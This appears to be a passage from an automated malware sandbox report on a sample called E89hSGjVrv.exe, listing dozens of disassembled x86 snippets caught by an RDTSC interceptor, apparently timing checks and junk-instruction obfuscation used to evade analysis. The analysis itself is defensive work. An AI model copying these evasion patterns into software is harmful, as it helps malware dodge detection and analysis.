              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52405 second address: F52455 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F50492D8196h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F50492D81A4h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F50492D81A4h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F50492D819Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52455 second address: F5245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5254B second address: F52556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F50492D8196h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52672 second address: F52676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52676 second address: F5267C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5267C second address: F526F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5048C0A32Fh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F5048C0A328h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a sub dword ptr [ebp+12468870h], esi 0x00000030 push 00000004h 0x00000032 mov dword ptr [ebp+122D29BCh], edx 0x00000038 nop 0x00000039 jng 00007F5048C0A338h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F526F5 second address: F526FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F526E4 second address: F526F5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52A76 second address: F52AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F50492D8196h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 sub eax, dword ptr [ebp+122D2C8Bh] 0x00000018 mov esi, 415D4E5Ah 0x0000001d popad 0x0000001e push 0000001Eh 0x00000020 mov cx, DA73h 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D33F2h], eax 0x0000002b mov al, A5h 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52B8B second address: F52B91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52D97 second address: F52D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52E4F second address: F52E66 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5048C0A32Ch 0x00000008 jg 00007F5048C0A326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52E66 second address: F52E70 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F50492D8196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52E70 second address: F52EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F5048C0A328h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, ebx 0x00000026 mov dh, B8h 0x00000028 lea eax, dword ptr [ebp+12485940h] 0x0000002e mov dword ptr [ebp+122D1B4Dh], esi 0x00000034 mov ecx, dword ptr [ebp+122D397Ah] 0x0000003a nop 0x0000003b jmp 00007F5048C0A333h 0x00000040 push eax 0x00000041 js 00007F5048C0A32Eh 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8B498 second address: F8B4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8B4A6 second address: F8B4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8B4AA second address: F8B4AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8B630 second address: F8B634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8B634 second address: F8B64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F50492D819Eh 0x0000000e jno 00007F50492D8196h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA7B second address: F8BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA81 second address: F8BA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA85 second address: F8BA91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F5048C0A326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA91 second address: F8BA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA97 second address: F8BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8BA9D second address: F8BAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F8F7DD second address: F8F7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F93E72 second address: F93EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F50492D81A4h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F50492D819Ah 0x00000011 jmp 00007F50492D81A7h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94313 second address: F94319 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94319 second address: F94329 instructions: 0x00000000 rdtsc 0x00000002 js 00007F50492D81A2h 0x00000008 jne 00007F50492D8196h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94484 second address: F94488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94488 second address: F9448E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F945B0 second address: F945B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F945B6 second address: F945BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F945BA second address: F945CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jp 00007F5048C0A326h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F946CE second address: F946E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D819Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007F50492D8196h 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94990 second address: F94995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94AFF second address: F94B1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F50492D819Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F50492D8196h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94FAF second address: F94FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5048C0A326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F94FB9 second address: F94FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F93885 second address: F93889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F93889 second address: F938A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F938A3 second address: F938A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F938A9 second address: F938AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F938AF second address: F938B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F938B3 second address: F938B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F96C63 second address: F96C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98C33 second address: F98C3F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F50492D8196h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98C3F second address: F98C44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98D8D second address: F98DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F50492D81A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98DA9 second address: F98DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98DB2 second address: F98DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98DB6 second address: F98DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F98DBA second address: F98DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F9B7D3 second address: F9B7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F9B7D7 second address: F9B7FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F50492D8196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d js 00007F50492D81B6h 0x00000013 pushad 0x00000014 jmp 00007F50492D81A2h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F9BA88 second address: F9BABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5048C0A339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5048C0A334h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FA6086 second address: FA608A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FA624A second address: FA625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5048C0A326h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F528ED second address: F528F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F528F3 second address: F52974 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5048C0A328h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add dword ptr [ebp+1247AA73h], edi 0x00000013 mov ebx, dword ptr [ebp+1248593Bh] 0x00000019 mov dx, di 0x0000001c add eax, ebx 0x0000001e push esi 0x0000001f mov edx, dword ptr [ebp+122D2DDCh] 0x00000025 pop edi 0x00000026 push eax 0x00000027 jng 00007F5048C0A33Ch 0x0000002d push edi 0x0000002e jmp 00007F5048C0A334h 0x00000033 pop edi 0x00000034 mov dword ptr [esp], eax 0x00000037 mov ecx, dword ptr [ebp+122D384Ah] 0x0000003d mov ecx, dword ptr [ebp+122D1B47h] 0x00000043 push 00000004h 0x00000045 call 00007F5048C0A337h 0x0000004a mov ecx, edi 0x0000004c pop ecx 0x0000004d nop 0x0000004e jo 00007F5048C0A32Ch 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F52974 second address: F5297B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F5297B second address: F52980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FAA1B4 second address: FAA1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F11849 second address: F1184F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FA9C88 second address: FA9CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F50492D8196h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f jmp 00007F50492D81A6h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F50492D819Fh 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB066A second address: FB0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB0670 second address: FB0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB0674 second address: FB068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5048C0A328h 0x0000000e js 00007F5048C0A32Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB1296 second address: FB129A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB14F4 second address: FB151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5048C0A331h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F5048C0A32Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB151C second address: FB1535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007F50492D8196h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB1535 second address: FB1539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB1D5C second address: FB1D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB1D62 second address: FB1D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB1D66 second address: FB1D83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F50492D81A9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: F0E292 second address: F0E296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E35 second address: FB6E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E3B second address: FB6E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E3F second address: FB6E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E43 second address: FB6E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E49 second address: FB6E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F50492D81A3h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB6E65 second address: FB6E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB7005 second address: FB700D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB7151 second address: FB7158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB728D second address: FB7293 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB7293 second address: FB72B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F5048C0A330h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB72B5 second address: FB72D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F50492D81A4h 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB7437 second address: FB743D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB743D second address: FB7441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB7441 second address: FB746D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5048C0A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jbe 00007F5048C0A33Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F5048C0A332h 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeRDTSC instruction interceptor: First address: FB75C9 second address: FB75CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
